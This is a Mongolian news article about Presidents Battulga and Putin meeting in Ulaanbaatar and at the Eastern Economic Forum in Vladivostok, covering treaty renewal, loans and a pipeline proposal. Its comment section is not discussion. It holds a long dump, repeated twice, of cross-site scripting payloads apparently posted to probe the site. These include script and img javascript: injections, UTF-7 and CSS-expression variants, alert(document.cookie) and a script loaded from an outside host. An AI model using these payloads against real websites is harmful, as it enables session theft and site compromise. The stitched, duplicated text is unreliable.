Өчигдөр Улаанбаатарт уулзалдсан Х.Баттулга, В.Путин хоёр маргааш Владивостокт Дорнын эдийн засгийн V чуулга уулзалтын хүрээнд дахин уулзах гэж байна. Оросын Холбооны Улсын Ерөнхийлөгч В.Путины санаачилгаар тав дахь жилдээ зохион байгуулагдаж буй Дорнын эдийн засгийн чуулганд манай Ерөнхийлөгч Х.Баттулга гурав дахь удаагаа оролцож буй нь энэ юм. Есдүгээр сарын 4-6-ны өдрүүдэд болох энэ жилийн чуулга уулзалтад 50 гаруй улс орны 5000 зочид төлөөлөгч оролцоно гэж форумын зүгээс мэдэгдэж байна.
Х.Баттулга Ерөнхийлөгч энэ жилийн чуулга уулзалтад оролцохдоо Төрийн тэргүүн, Ерөнхий сайд нарын тэргүүлэх нэгдсэн хуралдаанд оролцохын сацуу форумд оролцогч зарим улс орны төр засгийн удирдлагуудтай уулзалт хийнэ. Манай тухайд хоёр хөршөөсөө гадна Япон, Солонгос, Энэтхэг зэрэг олон улс оронтой эдийн засгийн хамтын ажиллагааг улам бүр нэмэгдүүлэх шаардлага бий. Тиймээс ч Дорнын эдийн засгийн чуулганыг зорьж ирж буй бусад улс орнуудын удирдлагуудтай тулж ярилцах нь манай тухайд чухал асуудал хэвээрээ. Энэ жилийн чуулга уулзалтад Японы Ерөнхий сайд Абэ Шинзо, Энэтхэгийн Ерөнхий сайд Нарендри Моди, Малайзын Ерөнхий сайд Махатхир Мохамед нарын төр засгийн удирдлагууд ирж байна. Харин БНХАУ-ын удирдагч Ши Жиньпин ирэхгүй бололтой. БНХАУ-ыг төлөөлж Төрийн зөвлөлийн Шадар сайд Ху Чуньхуа оролцох аж.
Өнөөдөр В.Путин Энэтхэгийн Ерөнхий сайд Нарендри Модитой уулзалт хийсэн бөгөөд маргааш бусад улс орны удирдлагуудтай уулзалтууд хийх аж.
Сануулахад, жилийн өмнөх есдүгээр сард Владивостокт Орос, Хятадын төрийн тэргүүнүүд уулзаж байсан. 2015 оноос хойш жил бүр зохион байгуулагдаж буй тус арга хэмжээнд БНХАУ-ын удирдагч Ши Жиньпин 2018 онд анх удаа оролцсон юм. Ши Жиньпин Дорнын эдийн засгийн чуулганыг анх удаа зорин ирсэнтэй зэрэгцэн Монгол, Орос, Хятад гурван улсын хамтарсан, 300 мянган хүнийг хамарсан Восток-18 нэртэй цэргийн хээрийн сургууль болсон нь олон улсын хэвлэлүүдийн анхаарлыг татаж байсан билээ. II дугаар дайнаас хойш ярьвал дэлхийн цэргийн түүхэн дэх хамгийн том хээрийн сургууль боллоо гэж харах аналистууд ч таарч байсан.
Өмнөх удаагийн Дорнын эдийн засгийн чуулганы хүрээнд 175 гэрээ, хэлэлцээр үзэглэсэн нь мөнгөн дүнгээр 2.9 их наяд рублиэр хэмжигдэнэ гэсэн тооцооллыг Оросын хэвлэлүүд бичиж байсан. Мөн чуулганд очсон удирдагчид Солонгосын хойг, бүс нутгийн эв найрамдал, Курилийн арлуудын маргаан гэхчлэн асуудлуудын талаар хөндсөн юм.
Манай Ерөнхийлөгчийн тухайд Монгол Улс, ОХУ-ын найрсаг харилцаа, хамтын ажиллагааны тухай 1993 оны гэрээг шинэчлэн хугацаагүйгээр байгуулах тухай саналыг 2017, 2018 онуудад дараалан тавьж байсан.
Тэгвэл өчигдрийн айлчлалын хүрээнд энэ асуудал шийдэгдсэн. Гадаад харилцааны сайд Д.Цогтбаатар хэлэхдээ "Монгол, Оросын хооронд суурь гэрээ болох 1993 онд байгуулагдсан Найрсаг харилцаа, хамтын ажиллагааны гэрээг шинэчилж, иж бүрэн түншлэл стратегийн түвшинд хүрч буйг тусгаж, хугацаагүй болголоо. Энэ бол түүхэн хэлэлцээр. Шинэ Монгол Улс, ОХУ-ын хоорондын харилцааны гол суурийг тавьж өгсөн эрх зүйн бааз шүү дээ. Дандаа өөрчлөгдөөд байхгүй, харилцаа шинэ шатанд гарч ирж байгаа учраас шинэчилсэн. Энэ бол зүгээр нэг яриа биш. Ард нь мэдээллийн технологи, боловсрол, шинжлэх ухаан, инновацын тал дээр хоёр тал нягт хамтран ажиллах тал дээр гэрээндээ тусгаж өгсөн" гэж байгаа юм.
Тэгэхээр Ерөнхийлөгчийн зүгээс хоёр жил дараалан тавьсан асуудал үр дүнд хүрсэн гэсэн үг.
Мөн ОХУ-аас олгох 100 тэрбум рублийн хөнгөлөлттэй зээлийг УБТЗ нийгэмлэгийн шинэчлэл болон эрчим хүчний салбарт зориулах, хоёр улсын Үндэсний аюулгүй байдлын зөвлөлийн хамтын ажиллагааг эрчимжүүлж бүс нутгийн аюулгүй байдлын хамтын ажиллагааны шинэчилсэн төлөвлөгөө гаргаж ажиллах талаар, Алс дорнодод далайн боомт ашиглах асуудлыг судалж буйгаа дурдаж, гурван улсын эдийн засгийн коридорын ажлыг эрчимжүүлэх хамтарсан ажлын хэсэг байгуулах болон Зүүн хойд Азийн эрчим хүчний супер сүлжээ байгуулахад хамтарч ажиллах асуудлаар саналаа илэрхийлж, санал, төслүүдтэй холбоотой эдийн засгийн тооцоо судалгааг В.Путинд гардуулж байсан билээ.
В.Путины манай улсад хийсэн айлчлалын хүрээнд 100 тэрбум рублийн зээлийг УБТЗ, Зүүнбаян-Ханги чиглэлийн төмөр замын бүтээн байгуулалтад зориулах сонирхолтой байгаагаа манай талаас дахин илэрхийлсэн. Уулзалт бүрт л энэ зээлийн асуудал яригдаж буй.
Өмнөх хоёр удаагийн Дорнын эдийн засгийн чуулганы хүрээнд яригдсан бас нэг асуудал бол ОХУ, БНХАУ-ыг холбосон байгалийн хийн хоолойг Монгол Улсын нутгаар дамжуулах Монгол Улсын Ерөнхийлөгчөөс тавьсан санал. Өчигдрийн айлчлалын хүрээнд энэ асуудал яригдсан гэх албан мэдээллийг бол өгөөгүй. Гэхдээ хоёр орны төрийн тэргүүн уулзалтын цагаа хэтрүүлж ярилцахдаа энэ болон бусад чухал асуудлыг ярьсан байхыг үгүйсгэхгүй.
Ерөнхийлөгч Х.Баттулга Зүүн хойд Азийн эрчим хүчний супер сүлжээ байгуулах болон хийн хоолойг Монголоор дамжуулах, гурван улсын эдийн засгийн коридорын төслүүдийг эрэмбэлэх талаар хамтарч ажиллахыг, мөн хөдөө аж ахуйн гаралтай нэмүү өртөг шингэсэн бүтээгдэхүүн экспортлох зэрэг асуудлыг дэмжиж ажиллахыг өмнөд хөршийн тэргүүн Ши Жиньпинд тавьсан. Харин Ши Жиньпин хоёр орны иж бүрэн стратегийн түншлэлийн харилцааг иж бүрэн утгаар шинэчилж, худалдааны эргэлтийг 2020 он гэхэд 10 тэрбум ам.долларт хүргэх, төмөр зам барих, боловсруулах үйлдвэрлэл хөгжүүлэх, бүс нутгийн энх тайван аюулгүй байдал гэх мэт олон чиглэлээр хамтран ажиллахдаа бэлэн байна гэсэн байр суурийг илэрхийлсэн билээ.
Дорнын эдийн засгийн чуулганы мэдээллийг эргэн хүргэнэ.
Сэтгэгдэл ( 798 )
”>alert(String.fromCharCode(66, 108, 65, 99, 75, 73, 99, 101))
alert(1)
alert(document.cookie)
; alert(document.cookie); var foo=
foo\; alert(document.cookie);//;
”/>
alert(document.cookie)
>
>alert(document.cookie)
fooalert(document.cookie)
>alert(document.cookie)
%3cscript%3ealert(document.cookie)%3c/script%3e
+ACIAPgA8-script+AD4-alert(document.location)+ADw-/script+AD4APAAi-
+ADw-script+AD4-alert(document.location)+ADw-/script+AD4-
+ADw-script+AD4-alert(document.location)+ADw-/script+AD4-
+ACIAPgA8-script+AD4-alert(document.location)+ADw-/script+AD4APAAi-
{alert(1)};1
alert(1)
Object.__noSuchMethod__ = Function,[{}][0].constructor._(”alert(1)”)()
crypto.generateCRMFRequest(”CN=0”,0,0,null,”alert(1)”,384,null,”rsa-dual-use”)
ReferenceError.prototype.__defineGetter__(”name”, function(){alert(123)}),x
({0:#0=alert/#0#/#0#(123)})
crosssitespt
TESTHTML5FORMACTION
document.write(”
a=”get”;b=”URL(ja\””;c=”vascr”;d=”ipt:ale”;e=”rt(”XSS”);\”)”;eval(a+b+c+d+e);
exp/*
@im\port”\ja\vasc\ript:alert(”XSS”)”;
scriptalert(XSS)/script
alert(”XSS”);
\”;alert(”XSS”);//
a=/XSS/alert(a.source)
””;!--”=&{()}
”;alert(String.fromCharCode(88,83,83))//\”;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//\”;alert(String.fromCharCode(88,83,83))//-->”>”>alert(String.fromCharCode(88,83,83))
”;alert(String.fromCharCode(88,83,83))//\”;alert(String.fromCharCode(88,83,83))//\”;alert(String.fromCharCode(88,83,83))//\\”;alert(String.fromCharCode(88,83,83))//--></SCRIPT>\”>”><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
””;!--\”<XSS>=&{()}
<IMG SRC=\”javascript:alert(”XSS”);\”>
<IMG SRC=javascript:alert(”XSS”)>
<IMG SRC=JaVaScRiPt:alert(”XSS”)>
<IMG SRC=`javascript:alert(\”RSnake says, ”XSS”\”)`>
<IMG SRC=javascript:alert("XSS")>
<IMG \”\”\”><SCRIPT>alert(\”XSS\”)</SCRIPT>\”>
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=javascript:alert(”XSS”)>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=\”jav ascript:alert(”XSS”);\”>
<IMG SRC=\”jav ascript:alert(”XSS”);\”>
<IMG SRC=\”jav ascript:alert(”XSS”);\”>
perl -e ”print \”<IMG SRC=java\0script:alert(\\”XSS\\”)>\”;” > out
perl -e ”print \”<SCR\0IPT>alert(\\”XSS\\”)</SCR\0IPT>\”;” > out
<IMG SRC=\” javascript:alert(”XSS”);\”>
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(\”XSS\”)>
<<SCRIPT>alert(\”XSS\”);//<</SCRIPT>
<SCRIPT SRC=//ha.ckers.org/.js>
<IMG SRC=\”javascript:alert(”XSS”)\”
test
\u003C
\u003c
\x3C
\x3c
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<A HREF=\”//www.google.com/\”>XSS</A>
<A HREF=\”//google\”>XSS</A>
<A HREF=\”htt p://6 6.000146.0x7.147/\”>XSS</A>
<HEAD><META HTTP-EQUIV=\”CONTENT-TYPE\” CONTENT=\”text/html; charset=UTF-7\”> </HEAD>+ADw-SCRIPT+AD4-alert(”XSS”);+ADw-/SCRIPT+AD4-
<META HTTP-EQUIV=\”Set-Cookie\” Content=\”USERID=<SCRIPT>alert(”XSS”)</SCRIPT>\”>
echo(”IPT>alert(\”XSS\”)</SCRIPT>”); ?>
<? echo(”<SCR)”;
</BODY></HTML>
<?xml:namespace prefix=\”t\” ns=\”urn:schemas-microsoft-com:time\”>
<t:set attributeName=\”innerHTML\” to=\”XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>\”>
<?import namespace=\”t\” implementation=\”#default#time2\”>
<HTML><BODY>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
<SPAN DATASRC=\”#xss\” DATAFLD=\”B\” DATAFORMATAS=\”HTML\”></SPAN>
<XML SRC=\”xsstest.xml\” ID=I></XML>
<XML ID=\”xss\”><I><B><IMG SRC=\”javas<!-- -->cript:alert(”XSS”)\”></B></I></XML>
</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
<XML ID=I><X><C><![CDATA[<IMG SRC=\”javas]]><![CDATA[cript:alert(”XSS”);\”>]]>
c=\”javascript:\”;
eval(a+b+c+d);
d=\”alert(”XSS”);\\”)\”;
b=\”URL(\\”\”;
a=\”get\”;
<EMBED SRC=\”data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\” type=\”image/svg+xml\” AllowScriptAccess=\”always\”></EMBED>
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert(”XSS”)></OBJECT>
<BASE HREF=\”javascript:alert(”XSS”);//\”>
<![endif]-->
<SCRIPT>alert(”XSS”);</SCRIPT>
<!--[if gte IE 4]>
<STYLE>.XSS{background-image:url(\”javascript:alert(”XSS”)\”);}</STYLE><A CLASS=XSS></A>
<STYLE type=\”text/css\”>BODY{background:url(\”javascript:alert(”XSS”)\”)}</STYLE>
xss:ex/*XSS*//*/*/pression(alert(\”XSS\”))”>
<STYLE TYPE=\”text/javascript\”>alert(”XSS”);</STYLE>
exp/*<A STYLE=”no\xss:noxss(\”*//*\”);
<XSS STYLE=\”xss:expression(alert(”XSS”))\”>
<IMG STYLE=\”xss:expr/*XSS*/ession(alert(”XSS”))\”>
<STYLE>@im\port”\ja\vasc\ript:alert(\”XSS\”)”;</STYLE>
<DIV STYLE=\”background-image: url(javascript:alert(”XSS”))\”>
<DIV STYLE=\”width: expression(alert(”XSS”));\”>
<DIV STYLE=\”background-image:\0075\0072\006C\0028”\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029”\0029\”>
<DIV STYLE=\”background-image: url(javascript:alert(”XSS”))\”>
<TABLE><TD BACKGROUND=\”javascript:alert(”XSS”)\”>
<TABLE BACKGROUND=\”javascript:alert(”XSS”)\”>
<FRAMESET><FRAME SRC=\”javascript:alert(”XSS”);\”></FRAMESET>
<IFRAME SRC=\”javascript:alert(”XSS”);\”></IFRAME>
<META HTTP-EQUIV=\”refresh\” CONTENT=\”0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\”>
<XSS STYLE=\”behavior: url(xss.htc);\”>
<IMG SRC=\”mocha:[code]\”>
scriptualert(EXSSE)/scriptu
<META HTTP-EQUIV=\”refresh\” CONTENT=\”0;url=javascript:alert(”XSS”);\”>
<IMG SRC=\”livescript:[code]\”>
<IMG SRC=”vbscript:msgbox(\”XSS\”)”>
<STYLE>li {list-style-image: url(\”javascript:alert(”XSS”)\”);}</STYLE><UL><LI>XSS
<LINK REL=\”stylesheet\” HREF=\”javascript:alert(”XSS”);\”>
<BR SIZE=\”&{alert(”XSS”)}\”>
<IMG DYNSRC=\”javascript:alert(”XSS”)\”>
<BGSOUND SRC=\”javascript:alert(”XSS”);\”>
<IMG LOWSRC=\”javascript:alert(”XSS”)\”>
<BODY ONLOAD=alert(”XSS”)>
<INPUT TYPE=\”IMAGE\” SRC=\”javascript:alert(”XSS”);\”>
<BODY BACKGROUND=\”javascript:alert(”XSS”)\”>
</TITLE><SCRIPT>alert(\”XSS\”);</SCRIPT>
\\”;alert(”XSS”);//
<SCRIPT>alert(/XSS/.source)</SCRIPT>
LOL
LOLalert(123)
({0:#0=alert/#0#/#0#(0)})
LOL*{/*all*/color/*all*/:/*all*/red/*all*/;/[0]*IE,Safari*[0]/color:green;color:bl/*IE*/ue;}
lol
...
hellox worldss
0&q=”;alert(String.fromCharCode(88,83,83))//\”;alert%2?8String.fromCharCode(88,83,83))//”;alert(String.fromCharCode?(88,83,83))//\”;alert(String.fromCharCode(88,83,83)%?29//-->”>”>alert(String.fromCharCode(88,83%?2C83))&submit-frmGoogleWeb=Web+Search
”;alert(String.fromCharCode(88,83,83))//\”;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//\”;alert(String.fromCharCode(88,83,83))//-->”>”>alert(String.fromCharCode(88,83,83))
alert(”hellox worldss”)&safe=high&cx=006665157904466893121:su_tzknyxug&cof=FORID:9#510
”>alert(String.fromCharCode(88,83,83))
alert(”XSS”);&search=1
document.write(”
”>alert(String.fromCharCode(88,83,83))
javascript:alert(”hellox worldss”)
alert(1)
>alert(document.cookie)
fooalert(1)
%3cscript%3ealert(1)%3c/script%3e
;alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//>>>alert(String.fromCharCode(88,83,83))
alert(XSS)>
String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41)
Click Me
click
CLICKME
”>
x
style=”x:”>
alert(1)
ClickMe
alert(1)
//
confirm(1);
/*
+-+-1-+-+alert(1)
~”\u0061” ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~”\u0061”)
X
MsgBox+1
click
alert(1)
Click Here
On Mouse Over
X
DIV
””alert(1) {Opera}
/{src:””/
//|\\ //|\\
/*iframe/src*/
////
X {IE7}
^__^
OnMouseOver {Firefox & Opera}
">{-o-link-source:””
SPAN
alert(0%0)
X
/***/confirm(”\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450”)/***/
/**/alert(document.location)/**/
alert(String.fromCharCode(49))
XYZ
X
X
">
/**/alert(1)/**/
prompt(1)
alert(1) {Opera}
{font-family:””
alert(1)
)alert(1);//
; alert(1);
alert(1)
alert(/XSS/)
alert(/XSS)
>alert(XSS)
alert(XSS)
alert(XSS);
alert(XSS)
alert(”XSS”);
alert(”hellox worldss”);
alert(123)
alert(123);
test
test
”>alert(String.fromCharCode(66, 108, 65, 99, 75, 73, 99, 101))
alert(1)
; alert(document.cookie); var foo=
alert(document.cookie)
foo\; alert(document.cookie);//;
”/>
alert(document.cookie)
fooalert(document.cookie)
>
>alert(document.cookie)
>alert(document.cookie)
+ADw-script+AD4-alert(document.location)+ADw-/script+AD4-
+ACIAPgA8-script+AD4-alert(document.location)+ADw-/script+AD4APAAi-
+ACIAPgA8-script+AD4-alert(document.location)+ADw-/script+AD4APAAi-
%3cscript%3ealert(document.cookie)%3c/script%3e
+ADw-script+AD4-alert(document.location)+ADw-/script+AD4-
alert(1)
crypto.generateCRMFRequest(”CN=0”,0,0,null,”alert(1)”,384,null,”rsa-dual-use”)
{alert(1)};1
ReferenceError.prototype.__defineGetter__(”name”, function(){alert(123)}),x
Object.__noSuchMethod__ = Function,[{}][0].constructor._(”alert(1)”)()
({0:#0=alert/#0#/#0#(123)})
crosssitespt
TESTHTML5FORMACTION
document.write(”
a=”get”;b=”URL(ja\””;c=”vascr”;d=”ipt:ale”;e=”rt(”XSS”);\”)”;eval(a+b+c+d+e);
exp/*
@im\port”\ja\vasc\ript:alert(”XSS”)”;
scriptalert(XSS)/script
alert(”XSS”);
a=/XSS/alert(a.source)
\”;alert(”XSS”);//
””;!--”=&{()}
”;alert(String.fromCharCode(88,83,83))//\”;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//\”;alert(String.fromCharCode(88,83,83))//-->”>”>alert(String.fromCharCode(88,83,83))
”;alert(String.fromCharCode(88,83,83))//\”;alert(String.fromCharCode(88,83,83))//\”;alert(String.fromCharCode(88,83,83))//\\”;alert(String.fromCharCode(88,83,83))//--></SCRIPT>\”>”><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
””;!--\”<XSS>=&{()}
<IMG SRC=\”javascript:alert(”XSS”);\”>
<IMG SRC=javascript:alert(”XSS”)>
<IMG SRC=JaVaScRiPt:alert(”XSS”)>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=`javascript:alert(\”RSnake says, ”XSS”\”)`>
<IMG \”\”\”><SCRIPT>alert(\”XSS\”)</SCRIPT>\”>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=javascript:alert(”XSS”)>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=\”jav ascript:alert(”XSS”);\”>
<IMG SRC=\”jav ascript:alert(”XSS”);\”>
<IMG SRC=\”jav ascript:alert(”XSS”);\”>
perl -e ”print \”<IMG SRC=java\0script:alert(\\”XSS\\”)>\”;” > out
perl -e ”print \”<SCR\0IPT>alert(\\”XSS\\”)</SCR\0IPT>\”;” > out
<IMG SRC=\” javascript:alert(”XSS”);\”>
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(\”XSS\”)>
<<SCRIPT>alert(\”XSS\”);//<</SCRIPT>
<SCRIPT SRC=//ha.ckers.org/.js>
<IMG SRC=\”javascript:alert(”XSS”)\”
\u003C
\u003c
\x3C
\x3c
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<A HREF=\”//google\”>XSS</A>
<A HREF=\”//www.google.com/\”>XSS</A>
<A HREF=\”htt p://6 6.000146.0x7.147/\”>XSS</A>
<HEAD><META HTTP-EQUIV=\”CONTENT-TYPE\” CONTENT=\”text/html; charset=UTF-7\”> </HEAD>+ADw-SCRIPT+AD4-alert(”XSS”);+ADw-/SCRIPT+AD4-
<META HTTP-EQUIV=\”Set-Cookie\” Content=\”USERID=<SCRIPT>alert(”XSS”)</SCRIPT>\”>
echo(”IPT>alert(\”XSS\”)</SCRIPT>”); ?>
<? echo(”<SCR)”;
</BODY></HTML>
<t:set attributeName=\”innerHTML\” to=\”XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>\”>
<?import namespace=\”t\” implementation=\”#default#time2\”>
<?xml:namespace prefix=\”t\” ns=\”urn:schemas-microsoft-com:time\”>
<HTML><BODY>
<XML SRC=\”xsstest.xml\” ID=I></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
<SPAN DATASRC=\”#xss\” DATAFLD=\”B\” DATAFORMATAS=\”HTML\”></SPAN>
<XML ID=\”xss\”><I><B><IMG SRC=\”javas<!-- -->cript:alert(”XSS”)\”></B></I></XML>
</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
<XML ID=I><X><C><![CDATA[<IMG SRC=\”javas]]><![CDATA[cript:alert(”XSS”);\”>]]>
c=\”javascript:\”;
eval(a+b+c+d);
d=\”alert(”XSS”);\\”)\”;
b=\”URL(\\”\”;
a=\”get\”;
<EMBED SRC=\”data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\” type=\”image/svg+xml\” AllowScriptAccess=\”always\”></EMBED>
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert(”XSS”)></OBJECT>
<BASE HREF=\”javascript:alert(”XSS”);//\”>
<![endif]-->
<SCRIPT>alert(”XSS”);</SCRIPT>
<!--[if gte IE 4]>
<STYLE type=\”text/css\”>BODY{background:url(\”javascript:alert(”XSS”)\”)}</STYLE>
<STYLE>.XSS{background-image:url(\”javascript:alert(”XSS”)\”);}</STYLE><A CLASS=XSS></A>
<STYLE TYPE=\”text/javascript\”>alert(”XSS”);</STYLE>
<DIV STYLE=\”width: expression(alert(”XSS”));\”>
exp/*<A STYLE=”no\xss:noxss(\”*//*\”);
<STYLE>@im\port”\ja\vasc\ript:alert(\”XSS\”)”;</STYLE>
xss:ex/*XSS*//*/*/pression(alert(\”XSS\”))”>
<XSS STYLE=\”xss:expression(alert(”XSS”))\”>
<IMG STYLE=\”xss:expr/*XSS*/ession(alert(”XSS”))\”>
<DIV STYLE=\”background-image:\0075\0072\006C\0028”\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029”\0029\”>
<DIV STYLE=\”background-image: url(javascript:alert(”XSS”))\”>
<DIV STYLE=\”background-image: url(javascript:alert(”XSS”))\”>
<TABLE><TD BACKGROUND=\”javascript:alert(”XSS”)\”>
<TABLE BACKGROUND=\”javascript:alert(”XSS”)\”>
<FRAMESET><FRAME SRC=\”javascript:alert(”XSS”);\”></FRAMESET>
<IFRAME SRC=\”javascript:alert(”XSS”);\”></IFRAME>
<META HTTP-EQUIV=\”refresh\” CONTENT=\”0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\”>
<META HTTP-EQUIV=\”refresh\” CONTENT=\”0;url=javascript:alert(”XSS”);\”>
scriptualert(EXSSE)/scriptu
<IMG SRC=\”livescript:[code]\”>
<IMG SRC=\”mocha:[code]\”>
<IMG SRC=”vbscript:msgbox(\”XSS\”)”>
<STYLE>li {list-style-image: url(\”javascript:alert(”XSS”)\”);}</STYLE><UL><LI>XSS
<XSS STYLE=\”behavior: url(xss.htc);\”>
<LINK REL=\”stylesheet\” HREF=\”javascript:alert(”XSS”);\”>
<BR SIZE=\”&{alert(”XSS”)}\”>
<BGSOUND SRC=\”javascript:alert(”XSS”);\”>
<IMG LOWSRC=\”javascript:alert(”XSS”)\”>
<BODY ONLOAD=alert(”XSS”)>
<BODY BACKGROUND=\”javascript:alert(”XSS”)\”>
<IMG DYNSRC=\”javascript:alert(”XSS”)\”>
<INPUT TYPE=\”IMAGE\” SRC=\”javascript:alert(”XSS”);\”>
</TITLE><SCRIPT>alert(\”XSS\”);</SCRIPT>
\\”;alert(”XSS”);//
<SCRIPT>alert(/XSS/.source)</SCRIPT>
({0:#0=alert/#0#/#0#(0)})
LOLalert(123)
LOL*{/*all*/color/*all*/:/*all*/red/*all*/;/[0]*IE,Safari*[0]/color:green;color:bl/*IE*/ue;}
LOL
lol
...
alert(”XSS”);&search=1
0&q=”;alert(String.fromCharCode(88,83,83))//\”;alert%2?8String.fromCharCode(88,83,83))//”;alert(String.fromCharCode?(88,83,83))//\”;alert(String.fromCharCode(88,83,83)%?29//-->”>”>alert(String.fromCharCode(88,83%?2C83))&submit-frmGoogleWeb=Web+Search
hellox worldss
alert(”hellox worldss”)&safe=high&cx=006665157904466893121:su_tzknyxug&cof=FORID:9#510
”;alert(String.fromCharCode(88,83,83))//\”;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//\”;alert(String.fromCharCode(88,83,83))//-->”>”>alert(String.fromCharCode(88,83,83))
document.write(”
”>alert(String.fromCharCode(88,83,83))
javascript:alert(”hellox worldss”)
”>alert(String.fromCharCode(88,83,83))
alert(1)
fooalert(1)
>alert(document.cookie)
%3cscript%3ealert(1)%3c/script%3e
;alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//>>>alert(String.fromCharCode(88,83,83))
alert(XSS)>
String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41)
Click Me
click
CLICKME
”>
x
style=”x:”>
alert(1)
ClickMe
alert(1)
//
confirm(1);
/*
+-+-1-+-+alert(1)
~”\u0061” ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~”\u0061”)
X
MsgBox+1
click
alert(1)
Click Here
On Mouse Over
X
DIV
””alert(1) {Opera}
/{src:””/
//|\\ //|\\
/*iframe/src*/
////
X {IE7}
^__^
OnMouseOver {Firefox & Opera}
">{-o-link-source:””
SPAN
alert(0%0)
X
/***/confirm(”\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450”)/***/
/**/alert(document.location)/**/
alert(String.fromCharCode(49))
XYZ
X
X
">
/**/alert(1)/**/
prompt(1)
alert(1) {Opera}
{font-family:””
alert(1)
)alert(1);//
; alert(1);
alert(1)
alert(/XSS/)
alert(/XSS)
alert(XSS)
>alert(XSS)
alert(XSS);
alert(XSS)
alert(”hellox worldss”);
alert(123)
alert(”XSS”);
alert(123);
test
alert
javascript:alert(1); javascript:alert(1); javascript:alert(1); javascript:alert(1); javascript:alert(1); javascript:alert(1); javascript:alert(1); ”`”>javascript:alert(1) ”`”>javascript:alert(1)
Дорнын цагаан саран